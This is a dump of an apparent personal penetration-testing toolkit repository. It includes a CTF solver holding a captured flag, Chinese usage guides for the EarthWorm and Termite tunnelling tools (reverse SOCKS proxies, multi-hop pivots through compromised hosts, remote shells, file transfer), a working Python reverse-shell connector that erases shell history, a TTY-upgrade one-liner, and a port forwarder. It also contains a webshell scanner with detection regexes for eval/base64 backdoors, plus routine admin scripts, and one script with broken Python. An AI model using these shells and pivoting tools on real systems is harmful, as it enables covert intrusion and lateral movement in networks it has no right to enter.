-------------------------------------------------------------------------------- 1 | Http 2 | python -m SimpleHTTPServer 80 3 | 4 | Ftp 5 | python -m pyftpdlib -p 21 -------------------------------------------------------------------------------- /other/test.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | # 3 | import requests 4 | import urllib 5 | import hashlib 6 | import bs4 7 | 8 | req = requests.get("http://106.75.67.214:2250") 9 | _cookies = req.cookies 10 | text = req.headers['Ciphertext'] 11 | print text 12 | 13 | content = req.content 14 | bsobj = bs4.BeautifulSoup(content, "html.parser") 15 | part = bsobj.findAll(text=lambda text: isinstance(text, bs4.Comment))[ 16 | 2].split("+")[1].split(")")[0] 17 | print part 18 | 19 | for i in range(100, 999): 20 | dest = str(i)+part 21 | if hashlib.sha1(dest).hexdigest() == text: 22 | data = {"pass": i} 23 | req = requests.post( 24 | "http://106.75.67.214:2250", data=data, cookies=_cookies) 25 | print req.content 26 | 27 | bsobj = bs4.BeautifulSoup(req.content, "html.parser") 28 | print bsobj.findAll(text=lambda text: isinstance(text, bs4.Comment))[2] 29 | part = bsobj.findAll(text=lambda text: isinstance(text, bs4.Comment))[ 30 | 2].split(u"\uff1a")[1] 31 | 32 | result = eval(part) 33 | 34 | data = {"pass": result} 35 | req = requests.post( 36 | "http://106.75.67.214:2250", data=data, cookies=_cookies) 37 | print req.content # flag{f325c62b-9505-4c13-ad4b-010bddb23c68} 38 | 39 | break 40 | 41 | else: 42 | continue 43 | -------------------------------------------------------------------------------- /proxy/Earthworm/Readme.txt: -------------------------------------------------------------------------------- 1 | 【软件介绍】 2 | 3 | EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。 4 | 专有主页: http://rootkiter.com/EarthWorm/ 5 | 6 | 【使用场景】 7 | 8 | 普通网络环境: 9 | 1. 
目标网络边界存在公网IP且可任意开监听端口: 10 | 11 | +---------+ +-------------------+ 12 | |HackTools| ->> | 8888-> 1.1.1.1 | 13 | +---------+ +-------------------+ 14 | 15 | a)./ew -s ssocksd -l 8888 16 | // 在 1.1.1.1 主机上通过这个命令开启 8888 端口的 socks 代理 17 | b) HackTools 可通过访问 1.1.1.1:8888 端口使用 1.1.1.1 主机提供的代理 18 | 19 | 2. 目标网络边界不存在公网 IP,需要通过反弹方式创建 socks 代理 20 | 21 | 一台可控公网IP主机 可控内网主机 22 | +---------+ +--------------------------+ | +---------------+ 23 | |HackTools| ->> | 1080 -> 1.1.1.1 -> 8888 | 防火墙 | <-- 2.2.2.2 | 24 | +---------+ +--------------------------+ | +---------------+ 25 | 26 | a) ./ew -s rcsocks -l 1080 -e 8888 27 | // 在 1.1.1.1 的公网主机添加转接隧道,将 1080 收到的代理请求转交给反连 8888 端口的主机 28 | b) ./ew -s rssocks -d 1.1.1.1 -e 8888 29 | // 将目标网络的可控边界主机反向连接公网主机 30 | 31 | c) HackTools 可通过访问 1.1.1.1:1080 端口使用 rssocks 主机提供的 socks5 代理服务 32 | 33 | 对于二重网络环境: 34 | 1. 获得目标网络内两台主机 A、B 的权限,情况描述如下: 35 | 36 | A 主机: 存在公网 IP,且自由监听任意端口,无法访问特定资源 37 | B 主机: 目标网络内部主机,可访问特定资源,但无法访问公网 38 | A 主机可直连 B 主机 39 | 40 | 可控边界主机A 可访问指定资源的主机B 41 | +---------+ +-----------------------+ +-----------------+ 42 | |HackTools| ->> | 1080 --> 2.2.2.2 --> | ->> | 9999 -> 2.2.2.3 | 43 | +---------+ +-----------------------+ +-----------------+ 44 | 45 | a) ./ew -s ssocksd -l 9999 46 | // 在 2.2.2.3 主机上利用 ssocksd 方式启动 9999 端口的 socks 代理 47 | b) ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999 48 | // 将 1080 端口收到的 socks 代理请求转交给 2.2.2.3 的主机。 49 | c) HackTools 可通过访问 2.2.2.2:1080 来使用 2.2.2.3 主机提供的 socks5 代理。 50 | 51 | 2. 
获得目标网络内两台主机 A、B 的权限,情况描述如下: 52 | 53 | A 主机: 目标网络的边界主机,无公网 IP,无法访问特定资源。 54 | B 主机: 目标网络内部主机,可访问特定资源,却无法回连公网。 55 | 56 | A 主机可直连 B 主机 57 | 一台可控公网IP主机 可控内网主机A 可访问指定资源的主机B 58 | +---------+ +--------------------------+ | +-----------------+ +-----------------+ 59 | |HackTools| ->> | 1080 -> 1.1.1.1 -> 8888 | 防火墙 | <-- 2.2.2.2 --> | ->> | 9999 -> 2.2.2.3 | 60 | +---------+ +--------------------------+ | +-----------------+ +-----------------+ 61 | 62 | a) ./ew -s lcx_listen -l 1080 -e 8888 63 | // 在 1.1.1.1 公网主机添加转接隧道,将 1080 收到的代理请求 64 | // 转交给反连 8888 端口的主机 65 | b) ./ew -s ssocksd -l 9999 66 | // 在 2.2.2.3 主机上利用 ssocksd 方式启动 9999 端口的 socks 代理 67 | c) ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999 68 | // 在 2.2.2.2 上,通过工具的 lcx_slave 方式,打通1.1.1.1:8888 和 2.2.2.3:9999 之间的通讯隧道 69 | d) HackTools 可通过访问 1.1.1.1:1080 来使用 2.2.2.3 主机提供的 socks5 代理 70 | 71 | 72 | 【参数说明】 73 | 74 | 目前工具提供六种链路状态,可通过 -s 参数进行选定,分别为: 75 | 76 | ssocksd rcsocks rssocks 77 | lcx_slave lcx_tran lcx_listen 78 | 79 | 其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理。 80 | 81 | 其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。 82 | 83 | lcx 类别管道: 84 | 85 | lcx_slave 该管道一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机。 86 | lcx_tran 该管道,通过监听本地端口接收代理请求,并转交给代理提供主机。 87 | lcx_listen 该管道,通过监听本地端口接收数据,并将其转交给目标网络回连的代理提供主机。 88 | 89 | 通过组合lcx类别管道的特性,可以实现多层内网环境下的渗透测试。 90 | 91 | 下面是一个三级跳的本地测试例子。。。 92 | ./ew -s rcsocks -l 1080 -e 8888 93 | ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999 94 | I:\www\ew.exe -s lcx_slave -f 127.0.0.1 -g 3389 -d 172.17.137.9 -e 9999 95 | ./ew -s lcx_listen -l 9999 -e 7777 96 | ./ew -s rssocks -d 127.0.0.1 -e 7777 97 | 98 | 数据流向为 IE -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks 99 | 100 | 【补充说明】 101 | 1.为了减少网络资源的消耗,程序中添加了超时机制,默认时间为10000毫秒(10秒), 102 | 用户可以通过追加 -t 参数来调整这个值,单位为毫秒。在多级级联功能中,超时机制 103 | 将以隧道中最短的时间为默认值。 104 | 2.单纯从设计原理上讲,多级级联的三种状态可以转发任意以TCP为基础的通讯服务, 105 | 包括远程桌面/web服务 等。 106 | 3.产品包中的 ew_for_Arm32 在开发者已有平台下(android手机、小米路由器、树莓派) 测试无误。 107 | 如果有其它异常环境请将对应详细细节反馈给作者,以便更新程序问题。 108 | 109 | 【联系作者】 110 
| 111 | rootkiter@rootkiter.com 112 | 如果您在使用中有什么好想法,或遇到什么BUG,都可以主动联系我。 113 | 我会尽最大所能让这个工具更加完美,感谢大家的支持。 114 | -------------------------------------------------------------------------------- /proxy/Earthworm/ew_for_Arm32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Earthworm/ew_for_Arm32 -------------------------------------------------------------------------------- /proxy/Earthworm/ew_for_Linux32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Earthworm/ew_for_Linux32 -------------------------------------------------------------------------------- /proxy/Earthworm/ew_for_MacOSX64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Earthworm/ew_for_MacOSX64 -------------------------------------------------------------------------------- /proxy/Earthworm/ew_for_Win.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Earthworm/ew_for_Win.exe -------------------------------------------------------------------------------- /proxy/Earthworm/ew_for_linux64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Earthworm/ew_for_linux64 -------------------------------------------------------------------------------- /proxy/Earthworm/ew_mipsel: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Earthworm/ew_mipsel -------------------------------------------------------------------------------- /proxy/Termite/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | name : Termite 用法 3 | --- 4 | 5 | # Usage 6 | 7 | 1. 以服务模式启动一个agent服务。 8 | 9 | > $ ./agent -l 8888 10 | 11 | 2. 令管理端连接到agent并对agent进行管理。 12 | 13 | > $ ./admin -c 127.0.0.1 -p 8888 14 | 15 | 3. 此时,admin端会得到一个内置的shell, 输入help指令可以得到帮助信息。 16 | 17 | >> help 18 | 19 | 4. 通过show指令可以得到当前agent的拓扑情况。 20 | 21 | >> show 22 | 0M 23 | +-- 1M 24 | 由于当前拓扑中只有一个agent,所以展示结果只有 1M , 25 | 其中1 为节点的ID号, 26 | M为MacOS系统的简写,Linux为L,Windows简写为W。 27 | 28 | 5. 将新agent加入当前拓扑 29 | > ./agent -c 127.0.0.1 -p 8888 30 | 31 | 6. 此时show指令将得到如下效果 32 | 0M 33 | +-- 1M 34 | | +-- 2M 35 | 这表明,当前拓扑中有两个节点,其中由于2节点需要通过1节点才能访问,所以下挂在1节点下方。 36 | 37 | 7. 在2节点开启socks代理,并绑定在本地端口 38 | >> goto 2 39 | 将当前被管理节点切换为 2 号节点。 40 | >> socks 1080 41 | 此时,本地1080 端口会启动个监听服务,而服务提供者为2号节点。 42 | 43 | 8. 在1号节点开启一个shell并绑定到本地端口 44 | >> goto 1 45 | >> shell 7777 46 | 此时,通过nc本地的 7777 端口,就可以得到一个 1 节点提供的 shell. 47 | 48 | 9. 将远程的文件下载至本地 49 | >> goto 1 50 | >> downfile 1.txt 2.txt 51 | 将1 节点,目录下的 1.txt 下载至本地,并命名为2.txt 52 | 53 | 10. 上传文件至远程节点 54 | >> goto 2 55 | >> upfile 2.txt 3.txt 56 | 将本地的 2.txt 上传至 2号节点的目录,并命名为3.txt 57 | 58 | 11. 
端口转接 59 | >> goto 2 60 | >> lcxtran 3388 10.0.0.1 3389 61 | 以2号节点为跳板,将 10.0.0.1 的 3389 端口映射至本地的 3388 端口 62 | 63 | 64 | # 更多支持 65 | http://rootkiter.com/toolvideo/toolmp4/1maintalk.mp4 66 | http://rootkiter.com/toolvideo/toolmp4/2socks.mp4 67 | http://rootkiter.com/toolvideo/toolmp4/3lcxtran.mp4 68 | http://rootkiter.com/toolvideo/toolmp4/4shell.mp4 69 | http://rootkiter.com/toolvideo/toolmp4/5file.mp4 70 | 71 | # 联系作者 72 | rootkiter@rootkiter.com 73 | -------------------------------------------------------------------------------- /proxy/Termite/admin_MacOS_x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/admin_MacOS_x64 -------------------------------------------------------------------------------- /proxy/Termite/admin_linux_i586: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/admin_linux_i586 -------------------------------------------------------------------------------- /proxy/Termite/admin_linux_i686: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/admin_linux_i686 -------------------------------------------------------------------------------- /proxy/Termite/admin_linux_x86_64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/admin_linux_x86_64 -------------------------------------------------------------------------------- /proxy/Termite/admin_win32.exe: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/admin_win32.exe -------------------------------------------------------------------------------- /proxy/Termite/agent_MacOS_x64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_MacOS_x64 -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_armv4l: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_armv4l -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_armv5l: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_armv5l -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_i586: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_i586 -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_i686: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_i686 -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_m68k: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_m68k -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_mips: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_mips -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_mipsel: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_mipsel -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_powerpc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_powerpc -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_powerpc-440fp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_powerpc-440fp -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_sh4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_sh4 -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_sparc: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_sparc -------------------------------------------------------------------------------- /proxy/Termite/agent_linux_x86_64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_linux_x86_64 -------------------------------------------------------------------------------- /proxy/Termite/agent_win32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/proxy/Termite/agent_win32.exe -------------------------------------------------------------------------------- /scripts/aes_decrypt.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf8 -*- 2 | import sys 3 | from Crypto.Cipher import AES 4 | 5 | 6 | def decrypt_aes(key, data): 7 | obj = AES.new(key, AES.MODE_ECB) 8 | return obj.decrypt(data) 9 | 10 | if __name__ == '__main__': 11 | if len(sys.argv) < 3: 12 | print("%s key encrypt" % sys.argv[0]) 13 | return False 14 | key = sys.argv[1] 15 | data = open(sys.argv[2], 'rb').read() 16 | print(decrypt_aes(key, data)) 17 | -------------------------------------------------------------------------------- /scripts/htpasswd.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin 3 | export PATH 4 | 5 | echo "=====================================" 6 | echo "# A tool like htpasswd for Nginx #" 7 | echo "#-----------------------------------#" 8 | echo "# Author : Virink #" 9 | echo "=====================================" 10 | 11 | #set UserName 12 | username="" 13 | read -p "Please input UserName:" username 14 | if [ 
"$username" = "" ]; then 15 | echo "Error:UserName can't be NULL!" 16 | exit 1 17 | fi 18 | echo "===========================" 19 | echo "UserName was: $username" 20 | echo "===========================" 21 | 22 | #set password 23 | unpassword="" 24 | read -p "Please input the Password:" unpassword 25 | if [ "$unpassword" = "" ]; then 26 | echo "Error:Password can't be NULL!" 27 | exit 1 28 | fi 29 | echo "===========================" 30 | echo "Password was: $unpassword" 31 | echo "===========================" 32 | password=$(perl -e 'print crypt($ARGV[0], "pwdsalt")' $unpassword) 33 | 34 | 35 | #set htpasswd file 36 | htfile="" 37 | read -p "Please input Auth filename:" htfile 38 | if [ "$htfile" = "" ]; then 39 | echo "Error:Auth filename can't be NULL!" 40 | exit 1 41 | fi 42 | echo "===========================" 43 | echo "Auth File: /etc/nginx/$htfile" 44 | echo "===========================" 45 | 46 | get_char() 47 | { 48 | SAVEDSTTY=`stty -g` 49 | stty -echo 50 | stty cbreak 51 | dd if=/dev/tty bs=1 count=1 2> /dev/null 52 | stty -raw 53 | stty echo 54 | stty $SAVEDSTTY 55 | } 56 | echo "" 57 | echo "Press any key to Creat...or Press Ctrl+c to cancel" 58 | char=`get_char` 59 | 60 | if [ ! -f /etc/nginx/$htfile.conf ]; then 61 | make -p /etc/nginx/$htfile.conf 62 | echo "Create Auth file......" 
63 | cat >/etc/nginx/$htfile.conf<" 6 | } -------------------------------------------------------------------------------- /scripts/killphp.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | while 1 3 | do 4 | # 重启php-fpm 5 | killall -9 php-fpm || ps -ef | grep php | grep -v 'grep' | awk '{print $2}' | xargs -n1 kill 6 | sleep 10s 7 | done -------------------------------------------------------------------------------- /scripts/python_tty.sh: -------------------------------------------------------------------------------- 1 | python -c 'import pty; pty.spawn("/bin/bash")' -------------------------------------------------------------------------------- /scripts/reset_mysql_root_password.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin 3 | export PATH 4 | 5 | # Check if user is root 6 | if [ $(id -u) != "0" ]; then 7 | echo "Error: You must be root to run this script!" 
8 | exit 1 9 | fi 10 | 11 | echo "+-------------------------------------------------------------------+" 12 | echo "| Reset MySQL/MariaDB root Password for LNMP, Written by Licess |" 13 | echo "+-------------------------------------------------------------------+" 14 | echo "| A tool to reset MySQL/MariaDB root password for LNMP |" 15 | echo "+-------------------------------------------------------------------+" 16 | echo "| For more information please visit https://lnmp.org |" 17 | echo "+-------------------------------------------------------------------+" 18 | echo "| Usage: ./reset_mysql_root_password.sh |" 19 | echo "+-------------------------------------------------------------------+" 20 | 21 | if [ -s /usr/local/mariadb/bin/mysql ]; then 22 | DB_Name="mariadb" 23 | DB_Ver=`/usr/local/mariadb/bin/mysql_config --version` 24 | elif [ -s /usr/local/mysql/bin/mysql ]; then 25 | DB_Name="mysql" 26 | DB_Ver=`/usr/local/mysql/bin/mysql_config --version` 27 | else 28 | echo "MySQL/MariaDB not found!" 29 | exit 1 30 | fi 31 | 32 | while :;do 33 | DB_Root_Password="" 34 | read -p "Enter New ${DB_Name} root password: " DB_Root_Password 35 | if [ "${DB_Root_Password}" = "" ]; then 36 | echo "Error: Password can't be NULL!!" 37 | else 38 | break 39 | fi 40 | done 41 | 42 | echo "Stoping ${DB_Name}..." 43 | /etc/init.d/${DB_Name} stop 44 | echo "Starting ${DB_Name} with skip grant tables" 45 | /usr/local/${DB_Name}/bin/mysqld_safe --skip-grant-tables >/dev/null 2>&1 & 46 | sleep 5 47 | echo "update ${DB_Name} root password..." 48 | if echo "${DB_Ver}" | grep -Eqi '^8.0.|^5.7.|^10.2.'; then 49 | /usr/local/${DB_Name}/bin/mysql -u root << EOF 50 | FLUSH PRIVILEGES; 51 | ALTER USER 'root'@'localhost' IDENTIFIED BY '${DB_Root_Password}'; 52 | EOF 53 | else 54 | /usr/local/${DB_Name}/bin/mysql -u root << EOF 55 | update mysql.user set password = Password('${DB_Root_Password}') where User = 'root'; 56 | EOF 57 | fi 58 | 59 | if [ $? 
-eq 0 ]; then 60 | echo "Password reset succesfully. Now killing mysqld softly" 61 | killall mysqld 62 | sleep 5 63 | echo "Restarting the actual ${DB_Name} service" 64 | /etc/init.d/${DB_Name} start 65 | echo "Password successfully reset to '${DB_Root_Password}'" 66 | else 67 | echo "Reset ${DB_Name} root password failed!" 68 | fi 69 | -------------------------------------------------------------------------------- /scripts/rtcp.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | ''' 4 | filename:rtcp.py 5 | @desc: 6 | 利用python的socket端口转发,用于远程维护 7 | 如果连接不到远程,会sleep 36s,最多尝试200(即两小时) 8 | 9 | @usage: 10 | ./rtcp.py stream1 stream2 11 | stream为:l:port或c:host:port 12 | l:port表示监听指定的本地端口 13 | c:host:port表示监听远程指定的端口 14 | 15 | @author: watercloud, zd, knownsec team 16 | @web: www.knownsec.com, blog.knownsec.com 17 | @date: 2009-7 18 | ''' 19 | 20 | import socket 21 | import sys 22 | import threading 23 | import time 24 | 25 | streams = [None, None] # 存放需要进行数据转发的两个数据流(都是SocketObj对象) 26 | debug = 1 # 调试状态 0 or 1 27 | 28 | def _usage(): 29 | print 'Usage: ./rtcp.py stream1 stream2\nstream : l:port or c:host:port' 30 | 31 | def _get_another_stream(num): 32 | ''' 33 | 从streams获取另外一个流对象,如果当前为空,则等待 34 | ''' 35 | if num == 0: 36 | num = 1 37 | elif num == 1: 38 | num = 0 39 | else: 40 | raise "ERROR" 41 | 42 | while True: 43 | if streams[num] == 'quit': 44 | print("can't connect to the target, quit now!") 45 | sys.exit(1) 46 | 47 | if streams[num] != None: 48 | return streams[num] 49 | else: 50 | time.sleep(1) 51 | 52 | def _xstream(num, s1, s2): 53 | ''' 54 | 交换两个流的数据 55 | num为当前流编号,主要用于调试目的,区分两个回路状态用。 56 | ''' 57 | try: 58 | while True: 59 | #注意,recv函数会阻塞,直到对端完全关闭(close后还需要一定时间才能关闭,最快关闭方法是shutdow) 60 | buff = s1.recv(1024) 61 | if debug > 0: 62 | print num,"recv" 63 | if len(buff) == 0: #对端关闭连接,读不到数据 64 | print num,"one closed" 65 | break 66 | s2.sendall(buff) 67 | if debug > 0: 68 | print num,"sendall" 69 | 
except : 70 | print num,"one connect closed." 71 | 72 | try: 73 | s1.shutdown(socket.SHUT_RDWR) 74 | s1.close() 75 | except: 76 | pass 77 | 78 | try: 79 | s2.shutdown(socket.SHUT_RDWR) 80 | s2.close() 81 | except: 82 | pass 83 | 84 | streams[0] = None 85 | streams[1] = None 86 | print num, "CLOSED" 87 | 88 | def _server(port, num): 89 | ''' 90 | 处理服务情况,num为流编号(第0号还是第1号) 91 | ''' 92 | srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 93 | srv.bind(('0.0.0.0', port)) 94 | srv.listen(1) 95 | while True: 96 | conn, addr = srv.accept() 97 | print "connected from:", addr 98 | streams[num] = conn # 放入本端流对象 99 | s2 = _get_another_stream(num) # 获取另一端流对象 100 | _xstream(num, conn, s2) 101 | 102 | def _connect(host, port, num): 103 | ''' 处理连接,num为流编号(第0号还是第1号) 104 | 105 | @note: 如果连接不到远程,会sleep 36s,最多尝试200(即两小时) 106 | ''' 107 | not_connet_time = 0 108 | wait_time = 36 109 | try_cnt = 199 110 | while True: 111 | if not_connet_time > try_cnt: 112 | streams[num] = 'quit' 113 | print('not connected') 114 | return None 115 | 116 | conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 117 | try: 118 | conn.connect((host, port)) 119 | except Exception, e: 120 | print ('can not connect %s:%s!' 
% (host, port)) 121 | not_connet_time += 1 122 | time.sleep(wait_time) 123 | continue 124 | 125 | print "connected to %s:%i" % (host, port) 126 | streams[num] = conn #放入本端流对象 127 | s2 = _get_another_stream(num) #获取另一端流对象 128 | _xstream(num, conn, s2) 129 | 130 | 131 | if __name__ == '__main__': 132 | if len(sys.argv) != 3: 133 | _usage() 134 | sys.exit(1) 135 | tlist = [] # 线程列表,最终存放两个线程对象 136 | targv = [sys.argv[1], sys.argv[2] ] 137 | for i in [0, 1]: 138 | s = targv[i] # stream描述 c:ip:port 或 l:port 139 | sl = s.split(':') 140 | if len(sl) == 2 and (sl[0] == 'l' or sl[0] == 'L'): # l:port 141 | t = threading.Thread(target=_server, args=(int(sl[1]), i)) 142 | tlist.append(t) 143 | elif len(sl) == 3 and (sl[0] == 'c' or sl[0] == 'C'): # c:host:port 144 | t = threading.Thread(target=_connect, args=(sl[1], int(sl[2]), i)) 145 | tlist.append(t) 146 | else: 147 | _usage() 148 | sys.exit(1) 149 | 150 | for t in tlist: 151 | t.start() 152 | for t in tlist: 153 | t.join() 154 | sys.exit(0) 155 | -------------------------------------------------------------------------------- /scripts/scanwebshell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | #__Author__ = virink 5 | #__Blog__ = https://www.virzz.com 6 | 7 | import os 8 | import sys 9 | import commands 10 | import re 11 | import time 12 | import base64 13 | import platform 14 | 15 | rulelist = [ 16 | '(\$_(GET|POST|REQUEST)\[.{0,15}\]\s{0,10}\(\s{0,10}\$_(GET|POST|REQUEST)\[.{0,15}\]\))', 17 | '(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))', 18 | '(eval(\s|\n)*\(base64_decode(\s|\n)*\((.|\n){1,200})', 19 | '((eval|assert)(\s|\n)*\((\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]\))', 20 | '(\$[\w_]{0,15}(\s|\n)*\((\s|\n)*\$_(POST|GET|REQUEST)\[.{0,15}\]\))', 21 | '(call_user_func\(.{0,15}\$_(GET|POST|REQUEST))', 22 | '(preg_replace(\s|\n)*\(.{1,100}[/@].{0,3}e.{1,6},.{0,10}\$_(GET|POST|REQUEST))', 23 | '(wscript\.shell)', 24 | 
'(cmd\.exe)', 25 | '(shell\.application)', 26 | '(documents\s+and\s+settings)', 27 | '(serv-u)', 28 | '(phpspy)', 29 | '(jspspy)', 30 | '(webshell)', 31 | '(Program\s+Files)' 32 | ] 33 | 34 | 35 | def ScanShell(path): 36 | for root, dirs, files in os.walk(path): 37 | for filespath in files: 38 | if filespath.find('.php') > 0 or filespath.find('.inc') > 0: 39 | file = open(os.path.join(root, filespath)) 40 | filestr = file.read() 41 | file.close() 42 | for rule in rulelist: 43 | result = re.compile(rule).findall(filestr) 44 | if result: 45 | print os.path.join(root, filespath) + '\r\n' 46 | break 47 | 48 | ############################################## 49 | if __name__ == '__main__': 50 | print ''' 51 | \t\t######################################### 52 | \t\t# AppName : Scan Shell # 53 | \t\t# Author : Virink # 54 | \t\t# Blog : https://www.virzz.com # 55 | \t\t#########################################\r\n''' 56 | if platform.system() != 'Linux': 57 | print '\tPlease Run in Linux' 58 | exit() 59 | if len(sys.argv) != 2: 60 | print '\tRun error\r\n\tUsage:python ' + sys.argv[0] + ' website_path\r\n\teg : python ' + sys.argv[0] + ' /root/www\r\n' 61 | exit() 62 | webroot = sys.argv[1] 63 | # Start scan webshell 64 | print '\tStart scan webshell' 65 | ScanShell(webroot) 66 | print '\tFinish scan webshell' 67 | -------------------------------------------------------------------------------- /scripts/shell_53_udp.py: -------------------------------------------------------------------------------- 1 | # -*- coding:utf-8 -*- 2 | #!/usr/bin/env python 3 | """ 4 | back connect py version,only linux have pty module 5 | code by google security team 6 | UDP by anthrax@insight-labs.org 7 | """ 8 | import sys,os,socket,pty 9 | shell = "/bin/sh" 10 | def usage(name): 11 | print 'python reverse connector' 12 | print 'usage: %s [udp]' % name 13 | 14 | def main(): 15 | if len(sys.argv) <3: 16 | usage(sys.argv[0]) 17 | sys.exit() 18 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
19 | try: 20 | if sys.argv[3]=='udp': 21 | s=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) 22 | except:pass 23 | try: 24 | s.connect((sys.argv[1],int(sys.argv[2]))) 25 | print 'connect ok' 26 | except: 27 | print 'connect faild' 28 | sys.exit() 29 | os.dup2(s.fileno(),0) 30 | os.dup2(s.fileno(),1) 31 | os.dup2(s.fileno(),2) 32 | global shell 33 | os.unsetenv("HISTFILE") 34 | os.unsetenv("HISTFILESIZE") 35 | os.unsetenv("HISTSIZE") 36 | os.unsetenv("HISTORY") 37 | os.unsetenv("HISTSAVE") 38 | os.unsetenv("HISTZONE") 39 | os.unsetenv("HISTLOG") 40 | os.unsetenv("HISTCMD") 41 | os.putenv("HISTFILE",'/dev/null') 42 | os.putenv("HISTSIZE",'0') 43 | os.putenv("HISTFILESIZE",'0') 44 | pty.spawn(shell) 45 | s.close() 46 | 47 | if __name__ == '__main__': 48 | main() -------------------------------------------------------------------------------- /scripts/socks5.py: 